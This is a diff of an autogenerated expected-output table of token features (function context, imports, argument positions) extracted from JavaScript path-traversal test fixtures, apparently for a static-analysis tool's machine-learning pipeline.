+| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:34:11:36 | obj | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:11:39:11:44 | method | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:5 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:5 | obj | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:5 | obj | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:5 | obj | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:5 | obj | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:13 | obj[method] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:13 | obj[method] | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:13 | obj[method] | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:13 | obj[method] | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:13 | obj[method] | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:37 | obj[met ... ethod]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:37 | obj[met ... ethod]) | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:37 | obj[met ... ethod]) | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:37 | obj[met ... ethod]) | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:3:12:37 | obj[met ... ethod]) | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:7:12:12 | method | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:7:12:12 | method | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:7:12:12 | method | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:7:12:12 | method | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:7:12:12 | method | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:25 | promisify | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:25 | promisify | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:25 | promisify | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:25 | promisify | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:25 | promisify | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | exceptional return of promisi ... ethod]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | exceptional return of promisi ... ethod]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | exceptional return of promisi ... ethod]) | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | exceptional return of promisi ... ethod]) | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | exceptional return of promisi ... ethod]) | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | promisi ... ethod]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | promisi ... ethod]) | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | promisi ... ethod]) | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | promisi ... ethod]) | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:17:12:37 | promisi ... ethod]) | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:28 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:28 | fs | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:28 | fs | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:28 | fs | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:28 | fs | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:36 | fs[method] | CalleeFlexibleAccessPath | promisify | | autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:36 | fs[method] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:36 | fs[method] | calleeImports | bluebird | @@ -7372,12 +69126,103 @@ tokenFeatures | autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:36 | fs[method] | enclosingFunctionBody | obj method obj method promisify fs method obj | | autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:36 | fs[method] | enclosingFunctionName | methods.reduce#functionalargument | | autogenerated/TaintedPath/my-async-fs-module.js:12:27:12:36 | fs[method] | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:12:30:12:35 | method | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:12:30:12:35 | method | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:12:30:12:35 | method | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:12:30:12:35 | method | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:12:30:12:35 | method | fileImports | bluebird fs | +| autogenerated/TaintedPath/my-async-fs-module.js:13:10:13:12 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/my-async-fs-module.js:13:10:13:12 | obj | contextSurroundingFunctionParameters | (obj, method) | +| autogenerated/TaintedPath/my-async-fs-module.js:13:10:13:12 | obj | enclosingFunctionBody | obj method obj method promisify fs method obj | +| autogenerated/TaintedPath/my-async-fs-module.js:13:10:13:12 | obj | enclosingFunctionName | methods.reduce#functionalargument | +| autogenerated/TaintedPath/my-async-fs-module.js:13:10:13:12 | obj | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:14:4:14:5 | {} | CalleeFlexibleAccessPath | methods.reduce | | autogenerated/TaintedPath/my-async-fs-module.js:14:4:14:5 | {} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/my-async-fs-module.js:14:4:14:5 | {} | contextFunctionInterfaces | | | autogenerated/TaintedPath/my-async-fs-module.js:14:4:14:5 | {} | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/my-async-fs-module.js:14:4:14:5 | {} | fileImports | bluebird fs | | autogenerated/TaintedPath/my-async-fs-module.js:14:4:14:5 | {} | receiverName | methods | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:0 | this | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:0 | this | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:1 | exports | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:1 | exports | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:1 | exports | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:1 | require | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:1 | require | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:7 | exports | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:7 | exports | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:7 | exports | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:15 | exports.require | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:15 | exports.require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:1:15 | exports.require | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:1:7:1 | exports ... );\\n\\t}\\n} | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:1:7:1 | exports ... );\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:1:7:1 | exports ... );\\n\\t}\\n} | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:9:1:15 | require | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:9:1:15 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:9:1:15 | require | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | require | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | require | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | require | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | require | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | this | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | this | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | this | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:19:1:18 | this | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | 'arguments' object of anonymous function | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | exceptional return of anonymous function | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | exceptional return of anonymous function | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | exceptional return of anonymous function | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | functio ... );\\n\\t}\\n} | assignedToPropName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | functio ... );\\n\\t}\\n} | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | functio ... );\\n\\t}\\n} | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | functio ... );\\n\\t}\\n} | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | return of anonymous function | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | return of anonymous function | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | return of anonymous function | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:19:7:1 | return of anonymous function | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:1:28:1:34 | special | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:2:6:2:12 | special | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:2:6:2:12 | special | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:2:6:2:12 | special | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:2:6:2:12 | special | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:2:6:2:12 | special | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:16 | require | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:16 | require | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:16 | require | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:16 | require | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:16 | require | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | exceptional return of require("fs") | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | exceptional return of require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | exceptional return of require("fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | exceptional return of require("fs") | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | exceptional return of require("fs") | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | require("fs") | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | require("fs") | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | require("fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | require("fs") | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:3:10:3:22 | require("fs") | fileImports | fs original-fs | | autogenerated/TaintedPath/my-fs-module.js:3:18:3:21 | "fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/my-fs-module.js:3:18:3:21 | "fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/my-fs-module.js:3:18:3:21 | "fs" | calleeImports | | @@ -7386,6 +69231,21 @@ tokenFeatures | autogenerated/TaintedPath/my-fs-module.js:3:18:3:21 | "fs" | enclosingFunctionBody | special special require fs require original-fs | | autogenerated/TaintedPath/my-fs-module.js:3:18:3:21 | "fs" | enclosingFunctionName | require | | autogenerated/TaintedPath/my-fs-module.js:3:18:3:21 | "fs" | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:16 | require | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:16 | require | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:16 | require | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:16 | require | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:16 | require | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | exceptional return of require ... al-fs") | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | exceptional return of require ... al-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | exceptional return of require ... al-fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | exceptional return of require ... al-fs") | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | exceptional return of require ... al-fs") | fileImports | fs original-fs | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | require ... al-fs") | contextFunctionInterfaces | require(special) | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | require ... al-fs") | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | require ... al-fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | require ... al-fs") | enclosingFunctionName | require | +| autogenerated/TaintedPath/my-fs-module.js:5:10:5:31 | require ... al-fs") | fileImports | fs original-fs | | autogenerated/TaintedPath/my-fs-module.js:5:18:5:30 | "original-fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/my-fs-module.js:5:18:5:30 | "original-fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/my-fs-module.js:5:18:5:30 | "original-fs" | calleeImports | | @@ -7394,36 +69254,179 @@ tokenFeatures | autogenerated/TaintedPath/my-fs-module.js:5:18:5:30 | "original-fs" | enclosingFunctionBody | special special require fs require original-fs | | autogenerated/TaintedPath/my-fs-module.js:5:18:5:30 | "original-fs" | enclosingFunctionName | require | | autogenerated/TaintedPath/my-fs-module.js:5:18:5:30 | "original-fs" | fileImports | fs original-fs | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:0 | this | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:0 | this | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | isPathInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | isPathInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | isPathInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | pathIsInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | rootPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | slash | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | slash | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:1:1:1 | slash | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:22 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:22 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:22 | fs = require('fs') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:5:1:22 | fs = require('fs') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:16 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:16 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:22 | exceptional return of require('fs') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:22 | exceptional return of require('fs') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:22 | require('fs') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:1:10:1:22 | require('fs') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:1:18:1:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:1:18:1:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:1:18:1:21 | 'fs' | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:1:18:1:21 | 'fs' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:1:18:1:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:1:18:1:21 | 'fs' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:11 | express | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:11 | express | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:32 | express | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:32 | express | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:32 | express ... press') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:2:5:2:32 | express ... press') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:21 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:21 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:32 | exceptional return of require('express') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:32 | exceptional return of require('express') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:32 | require('express') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:2:15:2:32 | require('express') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:2:23:2:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:2:23:2:31 | 'express' | InputArgumentIndex | 0 | | 